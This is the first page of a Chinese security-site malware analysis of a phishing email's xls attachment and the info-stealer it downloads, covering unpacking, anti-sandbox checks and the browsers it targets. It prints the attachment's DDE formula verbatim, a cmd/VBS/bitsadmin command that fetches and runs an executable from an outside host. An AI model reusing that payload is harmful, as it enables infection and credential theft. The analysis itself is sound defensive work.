欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

藏匿在邮件里的“坏小子”

来源:本站整理 作者:JustPlay 时间:2018-07-05 TAG: 我要投稿

不知从什么时候开始,我的垃圾邮件开始暴增,而且主题千奇百怪,有“再也不用去澳门赌博”、“免保人、免抵押”…等推广主题;有“南北方压岁钱差距有多大?”、“爱过才知道什么是痛”…的段子主题;也有“+我微信 dw178gg”、“加扣扣 2848116852”…的交友主题。
这些大部分都能从标题就能判断出来是垃圾邮件,像那种日文、繁体字糅杂在一起的邮件就很难辨别,每次我都要点开看一看里面有什么。咳咳,言归正传,
这里面最让人头痛的还是藏匿在正常邮件里的病毒和钓鱼欺诈邮件,这些“坏小子”们可不仅仅骗个点击而已,稍有不慎我们损失的可能非常多…
一、基本信息
文件名
xx电子账单.xls
SAH256
61472720ecd1f63f92593e271c0f1220001d0b2fe32a5ce732eb55c7b19c4e50
文件名
SwiftCopy.exe
SHA256
db34f7a1ed8dfaf299cc0024dfe8ee4d7e813a0f1e7bf5794db3676a4d07bdd5
这是我某个邮件中的 xls 文件,以及打开表格后下载的可疑文件。拿到可疑文件第一时间还是扔到“虚拟执行环境”中先让它自己可劲儿折腾一番,很快分析报告就出来了

很可惜,从沙箱报告中看不出特别关键的信息,只能从行为上看出些许端倪,接下来需要我手动开始分析了…
二、行为分析
上手之前准备工作要做足,先梳理下流程:

2.1 XLS 文件(Downloader)
原始样本是一个 xls 文件,主要功能是作为一个 downloader。此文件使用了外部链接功能,这是一种除宏,漏洞之外的另一种载荷投递的方式。打开文件后会提示你更新,点击更新后又会让你确定是否要启动 cmd 进程。


点击文档中的 #REF!可以看到将要执行的命令行代码
=cmd|'
/c @echo Set objShell = CreateObject("Wscript.Shell") > Gm.vbs
& @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://www.mva.by/tags/SwiftCopy.exe
%temp%Gm.exe&%temp%Gm.exe",0,True >> Gm.vbs& Gm.vbs'!A0
样本会从 www.mva.by/tags 中下载 SwiftCopy.exe 存放到临时目录下,然后运行。
2.2 SwiftCopy.exe 文件
使用 PEiD 查一下壳,显示为 ASProtect,我的脱壳技术一塌糊涂,在网上找了一个 OD 的脚本,瞬间脱壳,感谢网友的分享,网友博客链接:https://blog.csdn.net/qingye2008/Article/details/1898190
脚本名为 Aspr2.XX_unpacker_v1.osc,大家可以从网上搜索一下这个名字,应该可以搜到。

脱完壳之后是一个 Delphi 程序,其主要目的是创建自身并注入,但是如果不经过九曲十八弯的操作显示不出他的强大,他会循环调用自身中的一些函数,调用次数为 0x3B,这些函数中大部分没什么实质性的作用,但是万万不可大意,这些函数中还有反沙箱的操作,通过获得光标的值,判断光标是否在移动,而且这个循环会连续循环 7 次。

最终样本会创建自身并注入,不用想,重点功能肯定在注入的这部分代码中。
2.3 子进程
待到父进程调用 ZwResumeThread 时附加到目标进程中,代码结构比较简单,如果参数中有-u参数,将会睡眠一段时间。

值得一提的是,程序中调用的系统函数都是动态获得的,从而大大增加了静态分析的难度。

此样本的重点功能就是信息窃取,可以说是相当的全面,循环调用函数,可以看到循环次数为 101,窃取的信息包含浏览器信息,邮箱信息,远程登陆客户端信息等。

此时的程序已经没有了混淆,进入函数后就可以看到程序要窃取信息的目标。

对这些函数进行统计,获得的信息如下(可以说是相当全面)
浏览器类:
Internet Explorer,Mozilla Firefox,Google Chrome,KMeleon,Comodo Dragon,Comodo IceDragon,SeaMonkey,Opera,Safari,CoolNovo,Rambler Nichrome,RockMelt,Baidu Spark,Chromium,Titan Browser,Torch Browser,Yandex.Browser,Epic Privacy Browser,Sleipnir Browser,Vivaldi,Coowon Browser,Superbird Browser,Chromodo Browser,Mustan Browser,360 Browser,Cyberfox (x32+x64),Pale Moon,Maxthon browser,Citrio Browser,Chrome Canary,Waterfox,Orbitum,Iridium,

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载